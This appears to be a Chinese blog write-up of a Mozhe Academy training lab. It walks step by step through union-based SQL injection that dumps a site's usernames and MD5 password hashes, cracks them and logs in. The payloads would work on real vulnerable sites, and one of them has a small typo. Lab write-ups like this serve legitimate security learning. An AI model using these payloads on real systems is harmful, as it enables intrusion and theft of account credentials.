当前位置:网站首页>墨者学院SQL注入解题

墨者学院SQL注入解题

2020-11-08 09:40:12 osc_7bgz0no1

一·判断注入
输入id=1,正常返回。输入id=-1返回错误。由 此可知存在注入。
二·判断字段
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 此时报错,说明有四个字段
三·使用union查询注入点
输入union select 1,2,3,4
发现2,3为显注点
四·使用database()查库名
输入 union select 1,database(),3,4
查出库名为 mozhe_Discuz_StormGroup
五·查表名
输入
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
查询到StormGroup_member,notice
看见member,所以对第一个产生怀疑。所以首先查询第一个。
六·查询StormGroup_member中的存放的字段
输入
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
查询出id,name,password,status
七·查询密码和用户名
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
得到md5加密后的值。进行解密,得到密码。
如果密码不对,通过limit m,n来继续查询。
八·提交key
得到密码后进行登录可以看见key,复制,提交。



























版权声明
本文为[osc_7bgz0no1]所创,转载请带上原文链接,感谢
https://my.oschina.net/u/4415254/blog/4707940